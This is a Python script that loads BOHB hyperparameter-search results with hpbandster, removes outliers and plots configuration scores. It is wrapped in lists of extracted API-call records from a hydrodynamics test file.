[((10168, 10233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""x, y"""', "[('mock', None), (None, 'mock')]"], {}), "('x, y', [('mock', None), (None, 'mock')])\n", (10191, 10233), False, 'import pytest\n'), ((101, 126), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (124, 126), False, 'import warnings\n'), ((132, 194), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {'category': 'DeprecationWarning'}), "('ignore', category=DeprecationWarning)\n", (155, 194), False, 'import warnings\n'), ((918, 941), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {'dx': '[1, 2, 3]'}), '(dx=[1, 2, 3])\n', (927, 941), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((1210, 1253), 'pandas.read_csv', 'pd.read_csv', (['csv_path'], {'parse_dates': "['time']"}), "(csv_path, parse_dates=['time'])\n", (1221, 1253), True, 'import pandas as pd\n'), ((1462, 1505), 'pandas.read_csv', 'pd.read_csv', (['csv_path'], {'parse_dates': "['time']"}), "(csv_path, parse_dates=['time'])\n", (1473, 1505), True, 'import pandas as pd\n'), ((1649, 1684), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (1661, 1684), True, 'import pandas as pd\n'), ((1711, 1768), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (1732, 1768), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((2692, 2727), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (2704, 2727), True, 'import pandas as pd\n'), ((2755, 2820), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_structured', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_structured, ts, 'sigma', sigma)\n", (2776, 2820), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((3958, 3993), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (3970, 3993), True, 'import pandas as pd\n'), ((4019, 4076), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (4040, 4076), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((4241, 4276), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (4253, 4276), True, 'import pandas as pd\n'), ((4303, 4360), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""sigma"""', 'sigma'], {}), "(faces_frame_fm, ts, 'sigma', sigma)\n", (4324, 4360), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, 
_trim_to_faces_frame, _StructuredFaces\n'), ((4501, 4536), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (4513, 4536), True, 'import pandas as pd\n'), ((4557, 4606), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['faces_frame_fm', 'ts', '"""z"""', 'z'], {}), "(faces_frame_fm, ts, 'z', z)\n", (4578, 4606), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((5721, 5756), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (5733, 5756), True, 'import pandas as pd\n'), ((5766, 5807), 'snl_d3d_cec_verify.result.faces._faces_frame_to_depth', '_faces_frame_to_depth', (['faces_frame_fm', 'ts'], {}), '(faces_frame_fm, ts)\n', (5787, 5807), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((6185, 6220), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (6197, 6220), True, 'import pandas as pd\n'), ((6230, 6279), 'snl_d3d_cec_verify.result.faces._faces_frame_to_depth', '_faces_frame_to_depth', (['faces_frame_structured', 'ts'], {}), '(faces_frame_structured, ts)\n', (6251, 6279), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((8456, 8497), 'numpy.isclose', 'np.isclose', (["ds['$z$'].values", '(-1.00114767)'], {}), "(ds['$z$'].values, -1.00114767)\n", (8466, 8497), True, 'import numpy as np\n'), ((9649, 9696), 'numpy.isclose', 'np.isclose', (["ds['$\\\\sigma$'].values", '(-0.49942682)'], {}), "(ds['$\\\\sigma$'].values, -0.49942682)\n", (9659, 9696), True, 'import numpy as np\n'), ((10567, 10578), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (10576, 10578), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((10862, 10873), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (10871, 10873), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((11762, 11773), 'snl_d3d_cec_verify.cases.CaseStudy', 'CaseStudy', ([], {}), '()\n', (11771, 11773), False, 'from snl_d3d_cec_verify.cases import CaseStudy\n'), ((12586, 12628), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke', '_map_to_faces_frame_with_tke', (['map_path', '(-1)'], {}), '(map_path, -1)\n', (12614, 12628), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((14902, 14940), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame_with_tke', '_map_to_faces_frame_with_tke', (['map_path'], {}), '(map_path)\n', (14930, 14940), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((16904, 16937), 
'snl_d3d_cec_verify.result.faces._map_to_faces_frame', '_map_to_faces_frame', (['map_path', '(-1)'], {}), '(map_path, -1)\n', (16923, 16937), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((18892, 18921), 'snl_d3d_cec_verify.result.faces._map_to_faces_frame', '_map_to_faces_frame', (['map_path'], {}), '(map_path)\n', (18911, 18921), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((20573, 20595), 'numpy.array', 'np.array', (['[0, 0, 1, 1]'], {}), '([0, 0, 1, 1])\n', (20581, 20595), True, 'import numpy as np\n'), ((20609, 20645), 'snl_d3d_cec_verify.result.faces._get_quadrilateral_centre', '_get_quadrilateral_centre', (['densities'], {}), '(densities)\n', (20634, 20645), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((20893, 20914), 'snl_d3d_cec_verify.result.faces._FMFaces', '_FMFaces', (['path', '(2)', '(18)'], {}), '(path, 2, 18)\n', (20901, 20914), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((21111, 21146), 'snl_d3d_cec_verify.result.faces._trim_to_faces_frame', '_trim_to_faces_frame', (['trim_path', '(-1)'], {}), '(trim_path, -1)\n', (21131, 21146), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((22842, 22873), 'snl_d3d_cec_verify.result.faces._trim_to_faces_frame', '_trim_to_faces_frame', (['trim_path'], {}), '(trim_path)\n', (22862, 22873), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((24738, 24767), 'snl_d3d_cec_verify.result.faces._StructuredFaces', '_StructuredFaces', (['path', '(2)', '(18)'], {}), '(path, 2, 18)\n', (24754, 24767), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((956, 981), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (969, 981), False, 'import pytest\n'), ((1002, 1025), 'snl_d3d_cec_verify.result.faces._check_case_study', '_check_case_study', (['case'], {}), '(case)\n', (1019, 1025), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((5499, 5526), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (5512, 5526), 
False, 'import pytest\n'), ((5547, 5600), 'snl_d3d_cec_verify.result.faces._faces_frame_to_slice', '_faces_frame_to_slice', (['"""mock"""', '"""mock"""', '"""mock"""', '"""mock"""'], {}), "('mock', 'mock', 'mock', 'mock')\n", (5568, 5600), False, 'from snl_d3d_cec_verify.result.faces import _check_case_study, _faces_frame_to_slice, _faces_frame_to_depth, _map_to_faces_frame_with_tke, _map_to_faces_frame, _get_quadrilateral_centre, _FMFaces, _trim_to_faces_frame, _StructuredFaces\n'), ((6919, 6954), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (6931, 6954), True, 'import pandas as pd\n'), ((10355, 10382), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (10368, 10382), False, 'import pytest\n'), ((14490, 14525), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (14502, 14525), True, 'import pandas as pd\n'), ((18554, 18589), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (18566, 18589), True, 'import pandas as pd\n'), ((7231, 7266), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (7243, 7266), True, 'import pandas as pd\n'), ((7308, 7334), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01"""'], {}), "('2001-01-01')\n", (7320, 7334), True, 'import pandas as pd\n'), ((13927, 13962), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (13939, 13962), True, 'import pandas as pd\n'), ((16243, 16278), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (16255, 16278), True, 'import pandas as pd\n'), ((16320, 16355), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (16332, 16355), True, 'import pandas as pd\n'), ((18077, 18112), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (18089, 18112), True, 'import pandas as pd\n'), ((20061, 20096), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (20073, 20096), True, 'import pandas as pd\n'), ((20138, 20173), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (20150, 20173), True, 'import pandas as pd\n'), ((22259, 22294), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (22271, 22294), True, 'import pandas as pd\n'), ((23986, 24021), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 00:00:00"""'], {}), "('2001-01-01 00:00:00')\n", (23998, 24021), True, 'import pandas as pd\n'), ((24063, 24098), 'pandas.Timestamp', 'pd.Timestamp', (['"""2001-01-01 01:00:00"""'], {}), "('2001-01-01 01:00:00')\n", (24075, 24098), True, 'import pandas as pd\n'), ((11605, 11615), 'numpy.diff', 'np.diff', (['x'], {}), '(x)\n', (11612, 11615), True, 'import numpy as np\n')]
|
import colorsys
import math
import os
import random
from decimal import Decimal
import hpbandster.core.result as hpres
import matplotlib.pyplot as plt
import numpy as np
# smallest value is best -> reverse_loss = True
# largest value is best -> reverse_loss = False
REVERSE_LOSS = True
EXP_LOSS = 1
OUTLIER_PERC_WORST = 0.5
OUTLIER_PERC_BEST = 0.0
def analyze_bohb(log_dir, title):
# load the example run from the log files
result = hpres.logged_results_to_HBS_result(log_dir)
# get all executed runs
all_runs = result.get_all_runs()
# get the 'dict' that translates config ids to the actual configurations
id2conf = result.get_id2config_mapping()
# Here is how you get he incumbent (best configuration)
inc_id = result.get_incumbent_id()
# let's grab the run on the highest budget
inc_runs = result.get_runs_by_id(inc_id)
inc_run = inc_runs[-1]
# We have access to all information: the config, the loss observed during
# optimization, and all the additional information
inc_valid_score = inc_run.loss
inc_config = id2conf[inc_id]['config']
inc_info = inc_run['info']
    print('Best found configuration: ' + str(inc_config))
print('Score: ' + str(inc_valid_score))
print('Info: ' + str(inc_info))
# print('It achieved accuracies of %f (validation) and %f (test).' % (-inc_valid_score, inc_test_score))
# # Let's plot the observed losses grouped by budget,
# hpvis.losses_over_time(all_runs)
#
# # the number of concurent runs,
# hpvis.concurrent_runs_over_time(all_runs)
#
# # and the number of finished runs.
# hpvis.finished_runs_over_time(all_runs)
#
# # This one visualizes the spearman rank correlation coefficients of the losses
# # between different budgets.
# hpvis.correlation_across_budgets(result)
#
# # For model based optimizers, one might wonder how much the model actually helped.
# # The next plot compares the performance of configs picked by the model vs. random ones
# hpvis.performance_histogram_model_vs_random(all_runs, id2conf)
result = remove_outliers(result)
# result = filter_values(result)
# print_configs_sorted_by_loss(result)
# print_stats_per_value(result)
# plot_accuracy_over_budget(result)
plot_parallel_scatter(result)
    plt.title(title)
    file_name = str(title).strip().replace(' ', '_').lower()
    # save before plt.show(): show() blocks and the figure is closed afterwards
    plt.savefig(os.path.join("../experiments/automl_plots/", file_name + ".png"))
    plt.show()
def print_configs_sorted_by_loss(result):
lst = []
for k1, v1 in result.data.items():
for k2, v2 in v1.results.items():
loss = v2['loss']
config = v1.config
lst.append((loss, config))
lst.sort(key=lambda x: x[0])
for elem in lst:
print(elem)
def print_stats_per_value(result):
# get all possible keys
min_epoch = float('Inf')
config_params = {}
for value in result.data.values():
for config_param, config_param_val in value.config.items():
for epoch, epoch_result in value.results.items():
try:
loss = epoch_result["loss"]
min_epoch = min(min_epoch, epoch)
if config_param in config_params.keys():
config_params[config_param].append((config_param_val, epoch, loss))
else:
config_params[config_param] = [(config_param_val, epoch, loss)]
                except Exception:
                    print('Error in print_stats_per_value, continuing')
for config_param, data in (dict(sorted(config_params.items()))).items():
print(config_param)
# get all unique possible values for each config parameter
values = set(elem[0] for elem in data)
values = sorted(list(values))
if len(values) > 20:
continue
for value in values:
losses = []
for elem in data:
val, epoch, loss = elem
if val == value and epoch == min_epoch:
losses.append(loss)
print('{} {} {} {}'.format(value, np.mean(losses), np.std(losses), len(losses)))
def remove_outliers(result):
lut = []
for key, value1 in result.data.items():
for value2 in value1.results.values():
            if value2 is None:
loss = float('nan')
else:
loss = value2['loss']
lut.append([loss, key])
filtered_lut = [x for x in lut if math.isfinite(x[0])]
worst_loss = sorted(filtered_lut, reverse=REVERSE_LOSS)[0][0]
if REVERSE_LOSS:
worst_loss += 0.01 * abs(worst_loss)
else:
worst_loss -= 0.01 * abs(worst_loss)
# remove NaN's
for i in range(len(lut)):
if not math.isfinite(lut[i][0]) or lut[i][0] == 0:
lut[i][0] = worst_loss
for key in result.data[lut[i][1]].results.keys():
# hacky but sometimes some budgets are missing (presumably when terminating ongoing runs)
if result.data[lut[i][1]].results[key] is None:
continue
else:
result.data[lut[i][1]].results[key]['loss'] = worst_loss
# result.data.pop(elem[1], None)
lut.sort(key=lambda x: x[0], reverse=REVERSE_LOSS)
n_remove_worst = math.ceil(len(lut) * OUTLIER_PERC_WORST)
n_remove_best = math.ceil(len(lut) * OUTLIER_PERC_BEST)
# remove percentage of worst values
for i in range(n_remove_worst):
elem = lut.pop(0)
result.data.pop(elem[1], None)
# remove percentage of best values
for i in range(n_remove_best):
elem = lut.pop()
result.data.pop(elem[1], None)
return result
def filter_values(result):
del_list = []
for key, value1 in result.data.items():
id = key
config = value1.config
rep_env_num = config['rep_env_num']
ddqn_dropout = config['ddqn_dropout']
# if not ddqn_dropout == 0:
# del_list.append(id)
# if not rep_env_num == 5:
# del_list.append(id)
for id in del_list:
result.data.pop(id, None)
return result
def plot_accuracy_over_budget(result):
fig, ax = plt.subplots()
# plot hyperband plot
index = None
color = None
for key, value1 in result.data.items():
if key[0] is not index:
index = key[0]
color = get_bright_random_color()
try:
x = []
y = []
for key2, value2 in value1.results.items():
x.append(key2)
y.append(value2["loss"])
plt.semilogx(x, y, color=color)
        except Exception:
print('Error in plot_accuracy_over_budget, continuing')
ax.set_title('Score for different configurations')
ax.set_xlabel('epochs')
ax.set_ylabel('score')
def plot_parallel_scatter(result):
plt.subplots(dpi=300, figsize=(8, 4))
ep_m = 1e9
ep_M = -1e9
loss_m = 1e9
loss_M = -1e9
# get all possible keys
config_params = {}
for value in result.data.values():
for config_param, config_param_val in value.config.items():
for epoch, epoch_result in value.results.items():
try:
loss = epoch_result["loss"]
ep_m = min(ep_m, epoch)
ep_M = max(ep_M, epoch)
loss_m = min(loss_m, loss)
loss_M = max(loss_M, loss)
if config_param in config_params.keys():
config_params[config_param].append((config_param_val, epoch, loss))
else:
config_params[config_param] = [(config_param_val, epoch, loss)]
                except Exception:
print('Error in plot_parallel_scatter, continuing')
x_dev = 0.2
r_min = 3
r_max = 4
alpha = 0.4
text_x_offset = -0.1
text_y_offset = -0.1
size_text = 6
index = 0
for config_param, data in (dict(sorted(config_params.items()))).items():
# get all unique possible values for each config parameter
values = set(elem[0] for elem in data)
values = sorted(list(values))
n = len(data)
xs = np.zeros(n)
ys = np.zeros(n)
rads = np.zeros(n)
colors = np.zeros([n, 3])
# extract common features
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
ep = data[k][1]
acc = map_to_zero_one_range(data[k][2], loss_m, loss_M)
# test:
# loss_b = -1233125.5410615604
# loss_a = -5233125.5410615604 #(we minimize the negative reward)
# print(loss_b, "->", map_to_zero_one_range(loss_b, loss_m, loss_M))
# print(loss_a, "->", map_to_zero_one_range(loss_a, loss_m, loss_M))
rads[k] = linear_interpolation(np.log(ep), np.log(ep_m), np.log(ep_M), r_min, r_max) ** 2
colors[k, :] = get_color(acc)
# check for type (categorical,int,float,log)
if type(values[0]) is bool:
y_dev = x_dev / 2
for i in range(len(values)):
plt.text(index + text_x_offset, values[i] + text_y_offset, str(values[i]), rotation=90,
size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = values[i] + np.random.uniform(-y_dev, y_dev)
elif type(values[0]) is str:
y_dev = min(1 / len(values) / 2.5, x_dev / 2)
for i in range(len(values)):
plt.text(index + text_x_offset, i / (max(len(values) - 1, 1)) + text_y_offset, values[i],
rotation=90, size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = i / (max(len(values) - 1, 1)) + np.random.uniform(-y_dev, y_dev)
elif type(values[0]) is int:
y_dev = min(1 / len(values) / 2.5, x_dev / 2)
plotAllStr = len(values) < 20
if not plotAllStr:
min_val = min(values)
max_val = max(values)
plt.text(index + text_x_offset, 0 + text_y_offset, str(f"{Decimal(min_val):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 1 + text_y_offset, str(f"{Decimal(max_val):.1E}"), rotation=90, size=size_text)
for i in range(len(values)):
if plotAllStr:
plt.text(index + text_x_offset, i / (max(len(values) - 1, 1)), str(values[i]), rotation=90,
size=size_text)
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = i / (max(len(values) - 1, 1)) + np.random.uniform(-y_dev, y_dev)
else: # float
min_val = min(values)
max_val = max(values)
            # log scale if the min/max values differ too much
            # (assumes strictly positive values; the log/division below fail otherwise)
if max_val / min_val > 100:
val050 = np.exp((np.log(min_val) + np.log(max_val)) / 2)
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = linear_interpolation(np.log(data[k][0]), np.log(min_val), np.log(max_val), 0, 1)
# linear scale
else:
val050 = linear_interpolation(0.50, 0, 1, min_val, max_val)
for i in range(len(values)):
for k in range(len(data)):
if data[k][0] == values[i]:
xs[k] = index + np.random.uniform(-x_dev, x_dev)
ys[k] = linear_interpolation(data[k][0], min_val, max_val, 0, 1)
plt.text(index + text_x_offset, 0 + text_y_offset, str(f"{Decimal(min_val):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 0.5 + text_y_offset, str(f"{Decimal(val050):.1E}"), rotation=90, size=size_text)
plt.text(index + text_x_offset, 1 + text_y_offset, str(f"{Decimal(max_val):.1E}"), rotation=90, size=size_text)
plt.scatter(xs, ys, s=rads, c=colors, alpha=alpha, edgecolors='none')
index += 1
plt.yticks([], [])
plt.xticks(np.arange(index), (tuple(sorted(config_params.keys()))), rotation=90, fontsize=size_text)
plt.subplots_adjust(bottom=0.25)
def linear_interpolation(x, x0, x1, y0, y1):
# linearly interpolate between two x/y values for a given x value
return y0 + (y1 - y0) * (x - x0) / (x1 - x0 + 1e-9)
def map_to_zero_one_range(loss, loss_m, loss_M):
if loss_M < 1 and loss_m > 0 and REVERSE_LOSS == False:
        # if the loss is already in the [0, 1] range, there is no need to normalize anything
acc = loss
elif loss_M < 0 and loss_m > -1 and REVERSE_LOSS == True:
        # if the loss is in the [-1, 0] range, simply flip its sign
acc = -loss
else:
        # normalize the loss to the 0 (bad) .. 1 (good) range
acc = (loss - loss_m) / (loss_M - loss_m + 1e-9)
if REVERSE_LOSS:
acc = 1 - acc
acc = acc ** EXP_LOSS
return acc
def get_color(acc):
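    # Map a score in [0, 1] to an RGB ramp: red (bad) via yellow (0.5) to green (good).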
# print("acc: ", acc)
if acc <= 0:
# print("color: ", np.array([[1, 0, 0]]))
return np.array([[1, 0, 0]])
elif acc <= 0.5:
# print("color: ", np.array([[1, 0, 0]]) + 2 * acc * np.array([[0, 1, 0]]))
return np.array([[1, 0, 0]]) + 2 * acc * np.array([[0, 1, 0]])
elif acc <= 1:
# print("color: ", np.array([[1, 1, 0]]) + 2 * (acc - 0.5) * np.array([[-1, 0, 0]]))
return np.array([[1, 1, 0]]) + 2 * (acc - 0.5) * np.array([[-1, 0, 0]])
else:
# print("color: ", np.array([[0, 1, 0]]))
return np.array([[0, 1, 0]])
def get_bright_random_color():
h, s, l = random.random(), 1, 0.5
return colorsys.hls_to_rgb(h, l, s)
if __name__ == '__main__':
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-04-09'
# log_dir = '../results/bohb_params_ql_cb_cliff_2021-03-04-16'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-04-17'
# log_dir = '../results/bohb_params_ql_cb_cliff_2021-03-04-20'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-04-22'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-04-22'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-05-13'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-05-13'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-06-00'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-06-00'
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-06-10'
# log_dir = '../results/bohb_params_DDQN_ICM_cartpole_2021-03-06-10'
# title = "DDQN ICM on CartPole"
# log_dir = '../results/bohb_params_td3_icm_hc_2021-03-08-20'
# title = "TD3 ICM on HC"
# log_dir = '../results/bohb_params_td3_icm_cmc_2021-03-08-22'
# title = "TD3 ICM on CMC"
# log_dir = '../results/bohb_params_TD3_discrete_gumbel_temp_annealing_2021-03-11-14'
# title = "Discrete TD3 with annealed temp on CartPole"
# log_dir = '../results/bohb_params_TD3_discrete_gumbel_temp_annealing_on_syn_env_2_2021-03-11-23'
# title = "Discrete TD3 with annealed temp on CartPole Syn Env Model 2"
# log_dir = '../results/bohb_params_ppo_hc_2021-03-13-23'
# title = "PPO on HC"
# log_dir = '../results/bohb_params_td3_icm_cmc_max_reward_2021-03-16-00'
# title = "TD3 ICM on CMC max. reward"
# log_dir = '../results/bohb_params_td3_icm_hc_max_reward_2021-03-16-00'
# title = "TD3 ICM on HC max. reward"
# log_dir = '../results/bohb_params_ppo_hc_icm_1e-3_ent_coef_1e-1_action_std_2021-03-19-20'
# title = "PPO ICM on HC max. reward"
# log_dir = '../results/halfcheetah_td3_bohb_params_se_prep_2021-06-11-11'
# title = "TD3 HC max. reward"
# log_dir = '../results/halfcheetah_td3_bohb_params_se_prep_2021-06-13-17'
# title = "TD3 HC max. reward"
#
# log_dir = '../results/SE_evaluate_cmc_se_params_2021-07-27-11'
# title = "SE CMC HPO"
log_dir = "/home/ferreira/Projects/learning_environments/results/SE_evaluate_cmc_se_params_2021-07-30-10"
title = "SE CMC HPO"
analyze_bohb(log_dir, title=title)
|
[
"matplotlib.pyplot.title",
"numpy.mean",
"numpy.arange",
"colorsys.hls_to_rgb",
"os.path.join",
"numpy.std",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.subplots",
"hpbandster.core.result.logged_results_to_HBS_result",
"matplotlib.pyplot.show",
"random.random",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.semilogx",
"numpy.random.uniform",
"numpy.log",
"decimal.Decimal",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"numpy.array",
"math.isfinite"
] |
[((445, 488), 'hpbandster.core.result.logged_results_to_HBS_result', 'hpres.logged_results_to_HBS_result', (['log_dir'], {}), '(log_dir)\n', (479, 488), True, 'import hpbandster.core.result as hpres\n'), ((2340, 2356), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (2349, 2356), True, 'import matplotlib.pyplot as plt\n'), ((2361, 2371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2369, 2371), True, 'import matplotlib.pyplot as plt\n'), ((6298, 6312), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6310, 6312), True, 'import matplotlib.pyplot as plt\n'), ((6984, 7021), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'dpi': '(300)', 'figsize': '(8, 4)'}), '(dpi=300, figsize=(8, 4))\n', (6996, 7021), True, 'import matplotlib.pyplot as plt\n'), ((12817, 12835), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]', '[]'], {}), '([], [])\n', (12827, 12835), True, 'import matplotlib.pyplot as plt\n'), ((12945, 12977), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.25)'}), '(bottom=0.25)\n', 